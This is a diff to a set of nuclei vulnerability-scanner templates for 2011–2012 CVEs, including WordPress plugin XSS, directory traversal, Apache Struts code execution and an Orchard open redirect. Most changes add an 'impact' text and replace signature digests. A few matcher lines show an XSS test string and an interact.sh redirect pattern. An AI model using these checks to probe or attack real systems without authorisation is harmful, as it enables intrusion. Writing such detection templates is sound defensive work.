-# digest: 4b0a00483046022100ee2e79350670f365f41c530b1e8cc1e242a82ae70adc1152c366feabb9a5496a022100c2989851fa54f6b1b22a25489996483eeb82339fac23032402b077c9c3222c0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022026c6160757337260f02182e7da5247cd3375279bda0cb4019649d4d424ad7f820221008b06dbaf2dab8b4048049c3bb9dff509b4835cb93b748812a506ce7da9f72922:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml
index deb19ffc8b..61a9a50fb9 100644
--- a/http/cves/2011/CVE-2011-0049.yaml
+++ b/http/cves/2011/CVE-2011-0049.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive files and data on the server.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/16103
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206ca422d66ad876e6107ea812d536d7235747bc439bfd0244b238b90ac0b6f3f3022001e1db5cb3bfc0822b08b51e4898753807b14750bd10030d7e041ae2c8e69cc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210097d65a61847a71cf146303c48b07acbe6ee9573724d9b8a50d2bd5eb79462b780220062ff7750adae7407b954879fb76f5894ae9e28a09651cd9eb7cea7ddaada2d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml
index b6bb1f47b2..5528047a15 100644
--- a/http/cves/2011/CVE-2011-1669.yaml
+++ b/http/cves/2011/CVE-2011-1669.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
+  impact: |
+    An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022009da50f959ea77102bd6c708c7a73038671dfcc9c510ea3e4c680f0e99d3c1b70221009c2237750474a6f5c9c66ece823f4e1e717d377c2c4c3d7918fab2c0f408aa6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008b8f0bcba9fcb205a9e391e62ed56c7e34cdde7e59250198d678127ead4b9cef0220695a0b07debc640b341399be8b0ab088773c4e7e27cfb7b583f69432fb98935f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml
index 428f52d932..512b1d1609 100644
--- a/http/cves/2011/CVE-2011-2744.yaml
+++ b/http/cves/2011/CVE-2011-2744.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
   remediation: |
     Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a8e8920aba07fc0c1a26f58049ff9bc7238f8fab2c74e628b9d4240414007fdd02205bd18c7c250462d06b3e40d3f422ef7471c0aee0aae7ca5f8fd43ba938adc719:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e52378d2ad2631ef3866dc183c3d7e50e433fb239c2bf582d9743eb3ae8fbd430220419e2e3f855267e9a4cc1f49022609788d95e7e531a7ef02b34f9af4fdb62d45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml
index 2b94dcb98e..fc79abbd29 100644
--- a/http/cves/2011/CVE-2011-2780.yaml
+++ b/http/cves/2011/CVE-2011-2780.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - http://www.justanotherhacker.com/advisories/JAHx113.txt
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ccaa1ad7fac3e62c06cb569dcf091a56ce50c9158117a5d34de10aa5b822e43d02203a5170833a6d68bb5bade8169b4478251afb3f5d17df27248bc92955766f92ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022071fd623131d7bc529448e9ee46830beafa89d7ecccaad9846b2acccf9d44bfc1022100ef9a8e16568a6124b47717f337eb7629405220ee1508d3f0e0a4caf535ac2233:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml
index f74f8b5278..26d4d11230 100644
--- a/http/cves/2011/CVE-2011-3315.yaml
+++ b/http/cves/2011/CVE-2011-3315.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files and directories on the affected system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/36256
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201eb76aac1d05a02462dcbb4a0f570215da52235e4c2560555d7a7658d117cdca02204830579f89076aa827ef53abfb58ccea4f45383f3942f3b1c1ab7d145e1c60dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009b7392964ef378762e6b1bce5a5b25eb2084c11984e0c3ec13108d09f465682d02204ed59732b3f70aa5bfdb73ce1a8d1cc11c64e1393bcd0095f5bfdb14d7d1fb23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml
index b4abf4d032..c74b6299d4 100644
--- a/http/cves/2011/CVE-2011-4336.yaml
+++ b/http/cves/2011/CVE-2011-4336.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022053451e5690eb2f84dee04aa35a1c0954bd34bb6672d046237a4c07b1891df34c022046768382d17a3bae86fc3b88ec236ceec03a179318a2d79ad105ec3c947f9626:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ead2f7a38136dd68994c79dbeb18cf01fd4d516595fc88f5973525e340511446022100d80027066d11610588ffd72fd24fcdd4c226839cca15cdc0b265a9b54bf7cb87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml
index 6b96964292..6b03042dfc 100644
--- a/http/cves/2011/CVE-2011-4618.yaml
+++ b/http/cves/2011/CVE-2011-4618.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  impact: |
+    Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
@@ -44,4 +46,4 @@ http:
           - 'contains(body_2, "</script><script>alert(document.domain)</script>")'
           - 'contains(body_1, "Advanced Text Widget")'
         condition: and
-# digest: 4a0a00473045022100bab41b4e3cbdf9f91ef217eed2c475f2e55bbcc488d475bcd8554ffb5bfc2ed6022016a097a413083898aba272f37d3a0b34b295b6eb6c72bb77b3267b8d9e0a8d64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206a77864d6263a6c9397ee40b285ee2af4533ac19ea960e55397ed2caa5316154022100bf56f186c8aa43739fdb6501b7b59969e146f9d69ecb772b6097d7b1fd87cb79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml
index ecd32ada0a..fa6ae0c2ba 100644
--- a/http/cves/2011/CVE-2011-4624.yaml
+++ b/http/cves/2011/CVE-2011-4624.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4624
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009116632ffa126cd449fdc97ccbabe60966eeb951c1d0849d1d30e763e25fe56c022100b3e01c5535243fc7451c77cad005004d9ecd3a971cce97806ac805be23d0277e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e48c760facc10875f3b22aa4b2e7261cb9d94dbddc3bb83656766cfd3ae573d2022100cc1e13347644fd3ab565397b42e4b833231009c21c579f4ad5b936e3f8fa3f53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml
index 8cab1a7768..c9a04bd4f9 100644
--- a/http/cves/2011/CVE-2011-4804.yaml
+++ b/http/cves/2011/CVE-2011-4804.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/36598
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203affeb8d99a811e151da8924f8d7a577009eb90054ca14eb056b7d633a15cb2f022100eff7fa8466dfc8e5c1c7aa6c0f4521116f0c397b159fe24011c59b242ee27613:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a828722c2b46d5775d2ec9bd905f56af4509edb26806bea57f8a6dc77bfebb50221009a2cfeda87892055cac84f182ea05c4f0f1e41e4835ab51b04bcb0281b4f7838:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml
index 6d1d3e9c65..81fc43e5a7 100644
--- a/http/cves/2011/CVE-2011-4926.yaml
+++ b/http/cves/2011/CVE-2011-4926.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d56555e027f495343e0cc20949b907ac985a6b461074dd004330a02566ad1327022066a6a5d0d9314a5d36ea612835db8cef708fae9f287996ac86aaa1ff808e9f9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201e014fc72bf46cbcd1b06d11a0170ba550ca4984bf04f0d8c369f1cc4e4c1033022100fbf7e61f5dd4d08b3959553ada280e1d27b94faa5610e688201180230e2236e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml
index 02263abac8..60ef2a505c 100644
--- a/http/cves/2011/CVE-2011-5106.yaml
+++ b/http/cves/2011/CVE-2011-5106.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022042e55b9c813c44071ed574f3655a5ef53a8363ef952c58d1518b389e42f74f27022057f7ea384da619a03f3bf2a98b1d58eb8a89e84dc46a328b330810ddac4c8976:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038c3fec75cb4b8bf587e6df77c5d753c982049ad15b8672bfcddac5612c9e97a022054d03eb720bbbbc7d5ab05c19117b0ffcd706c84d4c37d51eb5c1aa0d899621b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml
index bdb61f296a..2a642d067e 100644
--- a/http/cves/2011/CVE-2011-5107.yaml
+++ b/http/cves/2011/CVE-2011-5107.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022055ced5bfd33e4afd72d67425819811a91e7e5f0876ce4e9885001d0c271de8af02201e4080fdcb830bf7270ef17418962c4874d2759c2f679dc72dbba486711b04fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202a877db4fb15ee1e82c7f37a95b434e0cc663caa5035ff5f2064dc717b056b7c022023f26db461db668dd7d9b185eb2803f6056bc3bd0ffd47204c8b102f592a2d04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml
index 7b3ce1164c..062b625e3b 100644
--- a/http/cves/2011/CVE-2011-5179.yaml
+++ b/http/cves/2011/CVE-2011-5179.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100aa234e86256ffc164333438fb7936a708815e293e76c9b28bd628c3e6224f65702203ff2f0e1d9b73ae425aac3c41cab67f26856c51d2f0d09f87468114a57ba76be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022029dc11cace1e2333cfd9688a0051a1d57addb9ff4bd78726fa9e9e0f33c66c7e022073cf2693084088fff3a4a54c921729c04768bfb3e1be915ab2744bd639beb38b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml
index 8d054c1eae..1c32f3d60a 100644
--- a/http/cves/2011/CVE-2011-5181.yaml
+++ b/http/cves/2011/CVE-2011-5181.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202af7bcc9621069d6db720d21c7742057c20f4657f0645be03ab678f2a104698c022079c834040fc7771880fe6161f0cc2c19d96dabd477c8d9ee292ef8f8c28c515e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ba506809b9ad5aab64016ffb9e331ef401083b09c3d3c9519f7e84d44413a6ef02210086a8844b3cbf42d134258706821a568927e093ad19a1c03fc0c27166b1509468:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml
index 723a5581e0..a47e02162c 100644
--- a/http/cves/2011/CVE-2011-5252.yaml
+++ b/http/cves/2011/CVE-2011-5252.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.
+  impact: |
+    An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks.
   remediation: |
     Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities.
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a00473045022100fd12e5a041aaae0a5130071fb6d9759118673193efd04dac265705836bcd458f0220112551af8b1e76af993ae7132cfd3191a310dd9bafb82ec45ef30cdbc813f68f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008422f3fc7d6aacfd8515a15ffef9144684a05df3de2d614412f0b4fc30e99d3c022100c0d5eccddc0e5a69cbb4ae993e1400aa262559e3dcf2d5c085df453d9880ca0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml
index 2e0bc4ce9c..348c2ec18e 100644
--- a/http/cves/2011/CVE-2011-5265.yaml
+++ b/http/cves/2011/CVE-2011-5265.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d310e6f52ce09f6cb66affe4c4277d3982ca0d24328f3714f57205df09c46885022100fbe9afa165399a09ef0b094f39e70ae664f3b368e35074460bb496d0b0b4b383:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206313bad87098f5965683f63da99d47a842af82dd612850eadc3943e6f1c4cd81022100ee53974c59c4a9d29ac7a810149c5e7ce9535b5bb808170cce6b91bc8150eb81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml
index c6f7ba2976..cbcaad14ed 100644
--- a/http/cves/2012/CVE-2012-0392.yaml
+++ b/http/cves/2012/CVE-2012-0392.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution on the affected server.
   remediation: Developers should immediately upgrade to at least Struts 2.3.18.
   reference:
     - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b1137eae8a344fa580bcdf0fd96d13817bfebb8a4af031afca3a1b562eefa577022068aa9fd24ac7956a98b731113729ef99c2e79b3e4e2942629722e45f6ee107c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022006282df56f2a901eecf94e9855d6db9df4946ed40b339abd3f6336b50969c41b02203b8999bd479093b096799e26a94f92a95d86ccd2f1eb2565bab5b8876cbe7e5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml
index ba2887e0a0..990069c471 100644
--- a/http/cves/2012/CVE-2012-0394.yaml
+++ b/http/cves/2012/CVE-2012-0394.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.
   remediation: |
     Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220214affb609f88f3bcefa9e96f9445a0c0b7dc150fc39e73903804932f73180840220614d57522a07fe917ca8530112b6cce116ea46fff598b28015ad0a9e71dbc88c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009683d0193918ff118b880d91083267c382f2691a3c9a956f08d27934ed4d25d5022025d99bbc4674f817bab05edcf843bc7763be217cb1c647100ee8207338e9055a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml
index 64df9a572b..7e797d39ce 100644
--- a/http/cves/2012/CVE-2012-0896.yaml
+++ b/http/cves/2012/CVE-2012-0896.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
   remediation: |
     Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022043270f6e9f2f9572e9191960de0be3a7fe5f4760eb1412907dc92dc5b792bb78022100c182afeef7ff9e408fa61647426441dee6e4ec42c69e1967b3e88e8e2de27746:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202937c32be7ffb92c9a11e845916e4b40d7f62f0a6ebcef1fb4707157f2b6f3040221008c5d345fb60fb88321f3a4f22b952d0e6f3396362ed4e66a5feff7a9bf57dcb4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml
index f6eb6cc86a..45f5774a28 100644
--- a/http/cves/2012/CVE-2012-0901.yaml
+++ b/http/cves/2012/CVE-2012-0901.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bf62b8ae0e9423b477c4176ec968c8fba0b4b524efcf38632b247311beab69d9022100c4bc8fdbb209d38145f17f2439446cef82d76e8e2e66739c224ce851d6873049:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022058105695f45aca7080f4d99b0b495691bedb9798487eb893b5fa06a342008b53022100974de668cb5c4db918db8736a206169c76a05004a331d51435ebfd1bed2e3e89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml
index 3ec8e4ecb2..cb6a21c41a 100644
--- a/http/cves/2012/CVE-2012-0981.yaml
+++ b/http/cves/2012/CVE-2012-0981.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210096935d615f52f39f003fd899f9cb1d7be9b48c9c882ff733f686d82ba34ddae7022100f939341b22db34d1feb5098038d1eb5b1cef6b52ee242b97077c38b00e179dbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210091503c32f6e760d5c3d3aa871a287093fcf5f148c0541566fca436a744cb258f0221009e995a8a3d34953722e404cec14297887b6609f433012e27c2371ecbdf2cf5e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml
index a1b15ee904..fe71b944ea 100644
--- a/http/cves/2012/CVE-2012-0991.yaml
+++ b/http/cves/2012/CVE-2012-0991.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: low
   description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of OpenEMR.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100da8448c9e26c17591bc554c10c81dda090ebf4c1a8d21c302f6d0879191390a20221009bf19c03b16e307a1de9fae3124ef6c59c32878d5acc8a289ca625251e5a1ab8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
